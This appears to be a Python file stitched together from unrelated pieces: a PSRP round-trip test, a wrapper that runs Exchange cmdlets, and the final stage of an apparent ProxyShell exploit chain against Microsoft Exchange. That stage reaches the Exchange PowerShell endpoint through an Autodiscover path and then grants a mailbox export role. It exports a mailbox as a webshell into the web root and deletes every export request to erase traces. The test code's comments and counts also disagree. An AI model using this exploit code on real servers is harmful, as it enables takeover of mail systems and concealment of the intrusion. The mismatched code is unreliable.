def test_psrp(self, functional_transports):
    """End-to-end PSRP round trip against every functional transport.

    For each WSMan transport the test opens a runspace pool, negotiates the
    session key (needed before a SecureString can be serialized), builds one
    pipeline of four statements and checks the outputs and verbose stream:

    1. ``Get-Item C:\\Windows`` - plain cmdlet with a parameter.
    2. ``Set-Variable password`` - a client-serialized SecureString is unwrapped
       back to plaintext inside the remote session, proving the key exchange.
    3. ``ConvertTo-SecureString`` - a server-created SecureString comes back
       to the client as its plaintext value.
    4. A large ``Write-Verbose`` message, proving fragmentation of a big
       verbose record survives intact.
    """
    # Built once; every transport is expected to return it unchanged.
    verbose_payload = "hello world " * 3000
    verbose_script = (
        "$VerbosePreference = 'Continue'; "
        "Write-Verbose '%s'" % verbose_payload
    )
    unwrap_script = (
        "[System.Runtime.InteropServices.marshal]"
        "::PtrToStringAuto([System.Runtime.InteropServices.marshal]"
        "::SecureStringToBSTR($password))"
    )

    for wsman in functional_transports:
        with RunspacePool(wsman) as pool:
            # The session key must exist before serialize() can wrap an SS.
            pool.exchange_keys()
            wrapped_secret = pool.serialize(u"super secret", ObjectMeta("SS"))

            ps = PowerShell(pool)

            # Statement 1: simple cmdlet + parameter.
            ps.add_cmdlet("Get-Item")
            ps.add_parameter("Path", "C:\\Windows")

            # Statement 2: store the encrypted SecureString in $password.
            ps.add_statement()
            ps.add_cmdlet("Set-Variable") \
                .add_parameter("Name", "password") \
                .add_parameter("Value", wrapped_secret)

            # Statement 3: unwrap $password to plaintext on the remote side.
            ps.add_statement()
            ps.add_script(unwrap_script)

            # Statement 4: server-side SecureString returned to the client.
            ps.add_statement()
            ps.add_cmdlet("ConvertTo-SecureString") \
                .add_parameter("String", "host secret") \
                .add_parameter("AsPlainText") \
                .add_parameter("Force")

            # Statement 5: large verbose record.
            ps.add_statement()
            ps.add_script(verbose_script)

            results = ps.invoke()

            assert ps.had_errors is False
            assert len(results) == 3
            assert str(results[0]) == "C:\\Windows"
            assert results[1] == u"super secret"
            assert results[2] == u"host secret"
            assert str(ps.streams.verbose[0]) == verbose_payload
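def connection(self, scriptname, **kwargs):
    """Run one Exchange cmdlet over PSRP and record the outcome on ``self``.

    Args:
        scriptname: Name of the cmdlet to run in the ``Microsoft.Exchange``
            endpoint. It selects which cmdlet executes, so if it ever comes
            from user input the caller should restrict it to a known set.
        **kwargs: Cmdlet parameters, passed through ``add_parameter`` as
            structured PSRP parameters rather than interpolated into a
            script string, so values are not re-parsed by PowerShell.

    Side effects on ``self``:
        On success ``message`` holds ``adapted_properties`` of every output
        object, ``isSuccess`` is ``True`` and ``count`` the number of objects.
        On a cmdlet error ``isSuccess`` is ``False``, ``code`` is ``201`` and
        ``msg`` is the error stream joined with newlines. If the transport
        itself raises, ``isSuccess`` is ``False``, ``code`` is ``201`` and
        ``msg`` is the exception object (kept as-is for existing callers).
    """
    try:
        with RunspacePool(self.wsman, configuration_name="Microsoft.Exchange") as pool:
            ps = PowerShell(pool).add_cmdlet(scriptname)
            # A plain loop instead of a side-effect-only list comprehension.
            for name, value in kwargs.items():
                ps.add_parameter(name, value)
            output = ps.invoke()

            if not ps.had_errors and not ps.streams.error:
                self.message = [i.adapted_properties for i in output]
                self.isSuccess = True
                self.count = len(output)
            else:
                # isSuccess is reset here so a failed call cannot leave a stale
                # True from an earlier successful call on the same instance.
                self.isSuccess = False
                self.code = 201
                # The original joined with the literal "%s" (an unformatted
                # placeholder); one error record per line is the intent.
                self.msg = "\n".join(str(s) for s in ps.streams.error)
    except Exception as e:
        self.isSuccess = False
        self.msg, self.code = e, 201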
def exploit_stage4(target, auth_b64, alias_name, subject, fShell):
    """Final stage of the Exchange PowerShell chain shown on this page.

    Over the authenticated Autodiscover/PowerShell endpoint it runs three
    admin actions through the ``Microsoft.Exchange`` PSRP endpoint: a role
    assignment, a mailbox export whose FilePath is under the web root, and a
    blanket removal of export requests.

    Args:
        target: Exchange host name used for the WSMan connection.
        auth_b64: Value placed in the ``X-Rps-CAT`` query parameter.
        alias_name: Mailbox alias passed to ``New-MailboxExportRequest``.
        subject: Message subject used for the export request name/filter.
        fShell: File name appended to the export FilePath.

    NOTE(review): the cmdlet invocations below are exactly the artefacts a
    defender would key on - a ``New-ManagementRoleAssignment`` granting
    "Mailbox Import Export", a ``New-MailboxExportRequest`` with a FilePath
    under ``inetpub\\wwwroot``, and ``Remove-MailboxExportRequest -Confirm:$false``
    over every request; confirm these are captured by the admin audit logging
    in the environment being assessed. None of the three ``ps.invoke()``
    results is inspected, so this function cannot report which step ran.
    """
    logger.debug("[Stage 4] Dealing with WSMV")
    # TLS certificate validation is disabled for this connection.
    wsman = WSMan(server=target, port=443, path='/autodiscover/[email protected]/Powershell?X-Rps-CAT=' + auth_b64 +'&Email=autodiscover/autodiscover.json%[email protected]', ssl="true", cert_validation=False)
    logger.debug("[Stage 4] Dealing with PSRP")
    with RunspacePool(wsman, configuration_name="Microsoft.Exchange") as pool:
        logger.debug("[Stage 4] Assign Management Role")
        ps = PowerShell(pool)
        #ps.add_cmdlet("Get-User")
        # Role assignment: the observable change is a new role assignment
        # on the "Organization Management" security group.
        ps.add_cmdlet("New-ManagementRoleAssignment")
        ps.add_parameter("Role", "Mailbox Import Export")
        ps.add_parameter("SecurityGroup", "Organization Management")
        output = ps.invoke()
    with RunspacePool(wsman, configuration_name="Microsoft.Exchange") as pool:
        logger.debug("[Stage 4] Exporting MailBox as Webshell")
        ps = PowerShell(pool)
        # Export request: the observable change is a file written via the
        # admin share into the aspnet_client directory of the web root.
        ps.add_cmdlet("New-MailboxExportRequest")
        ps.add_parameter("Mailbox", alias_name)
        ps.add_parameter("Name", subject)
        ps.add_parameter("ContentFilter", "Subject -eq '%s'" % (subject))
        ps.add_parameter("FilePath", "\\\\127.0.0.1\\c$\\inetpub\\wwwroot\\aspnet_client\\%s" % fShell)
        output = ps.invoke()
    logger.debug("[Stage 4] Webshell Path: c:\\inetpub\\wwwroot\\aspnet_client\\%s" % fShell)
    with RunspacePool(wsman, configuration_name="Microsoft.Exchange") as pool:
        logger.debug("[Stage 4] Cleaning Notification")
        ps = PowerShell(pool)
        # Removes every export request, not only the one created above.
        ps.add_script("Get-MailboxExportRequest | Remove-MailboxExportRequest -Confirm:$false")
        output = ps.invoke()